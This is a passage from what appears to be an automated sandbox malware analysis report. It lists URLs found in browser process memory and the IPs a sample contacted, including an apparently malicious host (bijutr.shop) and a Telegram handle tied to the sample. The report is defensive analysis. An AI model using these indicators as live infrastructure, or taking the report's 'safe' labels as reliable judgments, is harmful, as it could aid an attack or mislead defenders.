                                                                                        https://google-ohttp-relay-join.fastly-edge.com/:chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.16.drfalse
                                                                                            		high
                                                                                            https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://polymer.github.io/AUTHORS.txtchrome.exe, 0000000B.00000003.2246911750.00001E9000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246517198.00001E90010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246163106.00001E9000ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246544163.00001E9000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246875021.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323457526.00001E90002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246857475.00001E9000ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246624539.00001E90010A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246836265.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246486743.00001E900108C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.google.com/manifest.json0.16.drfalse
                                                                                                    		high
                                                                                                    https://docs.google.com/document/:chrome.exe, 0000000B.00000002.2329144945.00001E9001549000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://photos.google.com/settings?referrer=CHROME_NTPchrome.exe, 0000000B.00000002.2325886446.00001E90009A3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2245026834.00001E9000FCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326146786.00001E9000A18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://anglebug.com/7714chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://docs.google.com/presentation/oglchrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://bijutr.shop23e5ea2dd5aaD7D9fkpII.exe, 00000005.00000002.2770513290.00000000004DD000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://unisolated.invalid/chrome.exe, 0000000B.00000002.2325951329.00001E90009AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://photos.google.com?referrer=CHROME_NTPchrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/chrome/tips/chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327786774.00001E9000E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325825077.00001E9000950000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://drive.google.com/?lfhs=2chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://anglebug.com/6248chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://drive.google.com/?lfhs=2ation.Resultchrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ogs.google.com/widget/callout?eom=1chrome.exe, 0000000B.00000003.2285302429.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285121622.00001E9002844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2334359375.00001E90027DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2285508925.00001E9002794000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/6929chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/5281chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.youtube.com/?feature=ytcachrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327305685.00001E9000D64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324211904.00001E900054F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icormatchrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://docs.googl0chrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://issuetracker.google.com/255411748chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325263210.00001E90007C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324019525.00001E90004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://anglebug.com/7246chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionshicchrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://anglebug.com/7369chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://anglebug.com/7489chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://docs.google.com/presentation/installwebapp?usp=chrome_defaultjbchrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://docs.google.com/presentation/chrome.exe, 0000000B.00000002.2328952527.00001E90012D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://duckduckgo.com/?q=chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://chrome.google.com/webstorechrome.exe, 0000000B.00000003.2247463399.00001E900033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2472336978.000008C40017C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.16.dr, service_worker_bin_prod.js.16.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://drive-daily-2.corp.google.com/manifest.json0.16.drfalse
                                                                                                                                                                		high
                                                                                                                                                                http://polymer.github.io/PATENTS.txtchrome.exe, 0000000B.00000003.2246911750.00001E9000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246517198.00001E90010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246163106.00001E9000ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246544163.00001E9000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246875021.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323457526.00001E90002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246857475.00001E9000ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246624539.00001E90010A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246836265.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246486743.00001E900108C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://t.me/k04aelm0nk3Mozilla/5.0aD7D9fkpII.exe, 00000005.00000002.2770513290.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://issuetracker.google.com/161903006chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://www.ecosia.org/newtab/aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, CTJWTJ.5.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://drive-daily-1.corp.google.com/manifest.json0.16.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.youtube.com/chrome.exe, 0000000B.00000002.2325297166.00001E90007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326962003.00001E9000CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://drive-daily-5.corp.google.com/manifest.json0.16.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://duckduckgo.com/favicon.icochrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000B.00000002.2325498651.00001E9000858000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324282199.00001E9000558000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://docs.google.com/spreadsheets/chrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://anglebug.com/3078chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://anglebug.com/7553chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://anglebug.com/5375chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.youtube.com/s/notifications/manifest/cr_install.htmlltchrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://anglebug.com/5371chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        http://anglebug.com/4722chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://m.google.com/devicemanagement/data/apichrome.exe, 0000000B.00000003.2233552401.00001E90001C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 0000000F.00000003.2392125839.000008C400270000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://anglebug.com/7556chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://drive-daily-4.cchrome.exe, 0000000B.00000002.2323554720.00001E9000310000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refaD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://chromewebstore.google.com/chrome.exe, 0000000B.00000002.2322505965.00001E900000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2472336978.000008C40017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.16.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://www.youtube.com/?feature=ytcaoglchrome.exe, 0000000B.00000002.2329273254.00001E90015F8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://drive-preprod.corp.google.com/manifest.json0.16.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://srtb.msn.cn/2cc80dabc69f58b6_1.16.drfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://msn.comXIDv10Cookies.18.drfalse
                                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                                  https://chrome.google.com/webstore/manifest.json.16.drfalse
                                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                                    https://google-ohttp-relay-join.fastly-edge.com/#chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                                      https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.16.drfalse
                                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                                        https://clients4.google.com/chrome-syncchrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                                          https://publickeyservice.pa.gcp.privacysandboxservices.comchrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                                            https://google-ohttp-relay-join.fastly-edge.com/&chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                                              https://browser.events.data.msn.com/2cc80dabc69f58b6_1.16.drfalse
                                                                                                                                                                                                                                                		high

                                                                                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                                                                                Public IPs

                                                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                2.16.158.176
                                                                                                                                                                                                                                                		unknownEuropean Union
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.219.161.152
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                52.168.117.170
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                149.154.167.99
                                                                                                                                                                                                                                                		t.meUnited Kingdom
                                                                                                                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                23.219.161.132
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                162.159.61.3
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                172.217.21.36
                                                                                                                                                                                                                                                		www.google.comUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                20.110.205.119
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                188.245.216.205
                                                                                                                                                                                                                                                		bijutr.shopIran (ISLAMIC Republic Of)
                                                                                                                                                                                                                                                		16322PARSONLINETehran-IRANIRfalse
                                                                                                                                                                                                                                                204.79.197.219
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                142.250.181.65
                                                                                                                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                172.64.41.3
                                                                                                                                                                                                                                                		chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                23.44.201.20
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.44.201.28
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                18.238.49.124
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                                                		unknownReserved
                                                                                                                                                                                                                                                		unknownunknownfalse
                                                                                                                                                                                                                                                23.44.201.11
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                23.209.72.25
                                                                                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                                                Private

                                                                                                                                                                                                                                                IP
                                                                                                                                                                                                                                                192.168.2.5
                                                                                                                                                                                                                                                127.0.0.1

                                                                                                                                                                                                                                                General Information

                                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                Analysis ID:1581195
                                                                                                                                                                                                                                                Start date and time:2024-12-27 08:19:06 +01:00
